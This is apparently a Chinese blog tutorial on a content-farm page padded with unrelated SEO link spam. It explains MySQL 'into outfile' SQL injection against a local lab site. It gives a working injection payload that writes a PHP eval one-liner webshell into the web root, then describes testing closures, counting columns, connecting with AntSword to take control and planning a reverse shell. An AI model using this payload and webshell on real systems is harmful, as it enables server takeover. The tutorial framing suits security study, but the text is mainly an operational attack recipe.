当前位置: 首页 > news >正文

网站建设的步骤和要点官网seo怎么做

网站建设的步骤和要点,官网seo怎么做,网站建设的建议例子,宜昌广告制作公司目录 一,mysql文件上传要点 二,文件上传指令 一句话木马 三,实例 1,判断注入方式 2,测试目标网站的闭合方式: 3,写入一句话木马 4,拿到控制权 一,mysql文件上传…

目录

一,mysql文件上传要点

二,文件上传指令

一句话木马

三,实例

1,判断注入方式 

2,测试目标网站的闭合方式:

3,写入一句话木马

4,拿到控制权 


一,mysql文件上传要点

1,show variables like '%secure%';用来查看mysql是否有读写文件的权限

2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限

3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径

二,文件上传指令

其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。

文件上传的用法:

(1)直接可以写在网站的目录下面,然后可以当做一句话木马直接去连接

(2)发现目标网站有文件包含,同时数据库又具备写入一句话木马的权限进行利用

一句话木马

?id=-1')) union select 1,2,"<?php @eval($_POST['hyc']); ?>" into outfile "D:\\phpstudy_pro\\WWW\\hyc.php" --+

<?php @eval($_POST['password']);?>:一句话木马

password是预留密码,这里给的密码是hyc

D:\\phpstudy_pro\\WWW\\是文件路径

hyc.php是新插入的文件名

三,实例

1,判断注入方式 

 当我们向里面传值的时候,会提示...outfile,说明可用文件上传注入

2,测试目标网站的闭合方式:

但是报错内容没有显示是哪里报错

于是我们使用--+看一下到底是不是’为闭合方式,如下图报错不变,所以闭合方式不是’

于是我们将进行更详细的测试:

当我们试到'))时,可以正常显示

当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。

是因为正确答案'))的闭合方式使”无效

怎么解决呢?

我们可以用and 1=1和and 1=2来测试

双引号测试:

 两种结果一样,说明”不是正确的结果。

单引号和双括号测试:

 

两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。

测试列数

3,写入一句话木马

 在目标路径下可以看到写入的木马:

打开查看里面写入的内容:

4,拿到控制权 

 用蚁剑连一下目标靶场:

拿到了电脑的使用权,注入目标达成: 

在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限

 接下来可以上传大马,反弹拿web shell

http://www.fp688.cn/news/145963.html

相关文章:

  • 请seo的人帮做网站排名建站系统
  • 自己做网站多少钱文章代写
  • 让人做网站 需要准备什么条件百度优化师
  • 同样是div 怎么有些网站收录少 有些多seo优化排名是什么
  • 自己做企业网站好做吗白杨seo课程
  • 学做淘宝店的网站优秀企业网站模板
  • 网站毕业设计代做靠谱吗无锡百度竞价
  • 建设网站需要买什么手续百度普通版下载
  • 上海做网站的哪家好南宁企业官网seo
  • 做期货关注什么网站seo网站优化培训公司
  • 北京工作室网站建设传统营销方式有哪些
  • 企业网站每年续费吗网站建设模板
  • 唐山网站建设策划方案免费发布外链
  • 长治网站制作百度广告位价格表
  • 去迪拜网站做乞丐上海企业优化
  • 青岛网站建设哪家专业网络营销推广技术
  • 网站推广策划报告航空航天seo搜狗排名点击
  • 做网站打电话怎么和客户说网络推广和网站推广
  • 视频制作模板无锡seo优化公司
  • 深圳网站建设哪里太原seo公司
  • 手机网站域做什么广告电商网站制作
  • 单页网站如何做cpa百度seo查询收录查询
  • 网站建设领导小组新闻今天的最新新闻
  • 东凤镇 网站建设最新网络推广平台
  • 个人简历word模板企业站seo外包
  • 在家做网站怎么赚钱百度竞价ocpc
  • 喀什住房和城乡建设局网站北京网络营销咨询公司
  • 镇江网站建设一般多少钱天津网络广告公司
  • 做美女网站挣钱如何建立网站平台的步骤
  • java直播网站怎么做网络工程师培训班要多少钱